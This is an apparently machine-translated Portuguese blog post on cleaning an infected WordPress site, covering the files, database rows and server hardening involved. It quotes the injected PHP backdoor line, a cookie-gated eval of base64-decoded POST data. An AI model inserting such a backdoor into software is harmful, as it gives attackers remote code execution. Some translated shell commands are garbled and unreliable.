Antes de ler este post, você deve ver postar aqui, Para entender algo. :)
Eu encontrei em vários arquivos de blog em stealthsettings.com, códigos semelhantes aos abaixo, que apareceram como resultado do vírus com a façanha de WordPress.:
si
<?php if($_COOKIE[’44e827f9fbeca184′]==”5cd3c94b4b1c57ea”){ eval(base64_decode($_POST[‘file’])); exit; } ?>
Se for acima de arquivo xmlrpc.php da sonolentoMas a um grep servidor, você pode ver que há muito poucos de seu tipo no código fonte.
Limpeza de arquivos infectados:
Ooookkkk ...
1. A melhor solução, depois de ter tido backupE limpa o banco de dados é limpar arquivos WordPress (você pode manter wp-config.php e arquivos que não são estritamente relacionados à plataforma wp, depois de serem verificados cuidadosamente) do servidor e fazer o upload dos originais da versão 2.5.1 (Durante este fazer uma versão de atualização WP :)) http://wordpress.org/download/ . Limpe incluindo arquivos de tema, se você não confia em que a verificação de seu cuidado.
Parece ter sido afetados e os arquivos dos temas que não tenham sido usados antes no blog e simplesmente alterar o tema, não resolve o problema.
./andreea/wp-content/themes/default/index.php:
2. Pesquisar e apagar todos os arquivos contendo: * _new.php, * _old.php, * Jpgg *, Giff, * Pngg e arquivo wp-info.txt, se houver....
encontrar. -name “* _new.php”
encontrar. -name “* _old.php”
encontrar. -name "* .jpgg"
encontrar. -name “* _giff”
encontrar. -name “* _pngg”
encontrar. -name “wp-info.txt”
3. em / Tmp , Pesquisar e excluir pastas como tmpYwbzT2
Lavagem SQL :
1. na Tabela Tabela wp_options Veja se há excluir as linhas: internal_links_cache, rss_f541b3abd05e7962fcab37737f40fad8 si wordpress_options.
2. Tudo em wp_options, vamos para active_plugins e excluir, se existe um plugin que termina em uma das extensões * _new.php, * _old.php, *. jpgg, *. giff, *. pngg ou se outra extensão é suspeito, verifique cuidadosamente.
3. Na Tabela wp_users, Veja se há um usuário que ainda não escreveu nada no seu direito, a coluna user_nicename. Exclua este usuário, mas lembre-se do número na coluna ID. Este usuário provavelmente usará "WordPress”Ca user_login e parece ser criado em 00: 00: 00 0000-00-00.
4. Vá para a Tabela wp_usermeta e excluir todas as linhas pertencentes ID acima.
Depois de fazer a limpeza do sql, desabilite e ative qualquer plugin. (no blog -> Painel -> Plug-ins)
Servidor seguro:
1. Veja o que diretórios e arquivos são "gravável"(chmod 777) e tente colocar um chmod que não permitirá mais a sua escrita em nenhum nível. (chmod 644, por exemplo)
Encontrar. -Perm-2-ls
2. Veja o que os arquivos têm o conjunto de bits suid ou sgid . Se você não usar esses arquivos colocar sobre eles chmod 0 ou desinstalar o pacote que contém. São muito perigosas, porque eles privilégios de execução "grupo"Ou"raiz"E não com privilégios de usuário normal para executar esse arquivo.
find /-type f-perm-04000-ls
find /-type f-perm-02000-ls
3. Verifique quais portas estão abertas e tentar fechar ou proteger aqueles que não são utilizados.
netstat-an | grep-i ouvir
Sobre isso. Eu vejo Alguns blogs são proibidos de Google Search e outros dizem "Ele fez bem!!!" . Bem, eu teria feito isso por eles... mas o que você diria se o Google começasse a banir todos os sites formando É SPAM e colocar Trojans (Trojan.Clicker.HTML) em cookies?
Eu pensei em "WordPress Exploit - Limpe arquivos de vírus, SQL e segurança do servidor. ”